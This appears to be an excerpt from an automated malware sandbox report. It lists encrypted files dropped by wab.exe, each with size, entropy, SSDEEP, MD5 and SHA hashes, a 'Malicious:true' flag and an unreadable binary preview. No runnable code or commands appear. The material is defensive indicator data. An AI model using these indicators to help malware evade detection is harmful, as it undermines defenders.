                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):170844
                                                                                Entropy (8bit):7.998943493910235
                                                                                Encrypted:true
                                                                                SSDEEP:3072:0AXzYx+iK6UMWd7J/VCYmZMdr2XlrVqNO36g9wfwYNlLmP16/yev+OI9l:0AXmpUz7JU5R1Jqs9w4cBvu9l
                                                                                MD5:0577E87CA6A52F5127B54105B4870E6D
                                                                                SHA1:1B3849E6E11071A89BF5ACA1899B30B2654B84A1
                                                                                SHA-256:59A1EEA3454237BA1C54CDF129E13733C33CA86E48FF64D394F4E9709AD30D3F
                                                                                SHA-512:332CC5226F81D8A0AF2E917EF95847EB4D37B715AA78A8CED0F2D957CDC8E763FE76C78A17510847DBBEB28380A93683668401D610D94D1CD9782513BD55A146
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174160
                                                                                Entropy (8bit):7.999020795554231
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIJz7WVg4yGxODBr3FXXl0g3FtlT0RCF2rY:qYb1JPecOQErjwNFnl0A0gFj
                                                                                MD5:0842FF3F617DADEB82C911F1989134B9
                                                                                SHA1:44ADE0E77F69518CDF54EC095337C08CA9E70E73
                                                                                SHA-256:DC567B5F053E18579E66207FED8568543570114966ACB4BB1D535F9BCD4B3EB2
                                                                                SHA-512:782013F1B27C8A548995ABFECF24AC9CD48E19EEC972F0FC51A44546C8994053226EF22441DEAF9C062398E8CD08C9A22731F2A6DA7761628ABB3D9BA8D2619F
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174160
                                                                                Entropy (8bit):7.999020795554231
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIJz7WVg4yGxODBr3FXXl0g3FtlT0RCF2rY:qYb1JPecOQErjwNFnl0A0gFj
                                                                                MD5:0842FF3F617DADEB82C911F1989134B9
                                                                                SHA1:44ADE0E77F69518CDF54EC095337C08CA9E70E73
                                                                                SHA-256:DC567B5F053E18579E66207FED8568543570114966ACB4BB1D535F9BCD4B3EB2
                                                                                SHA-512:782013F1B27C8A548995ABFECF24AC9CD48E19EEC972F0FC51A44546C8994053226EF22441DEAF9C062398E8CD08C9A22731F2A6DA7761628ABB3D9BA8D2619F
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
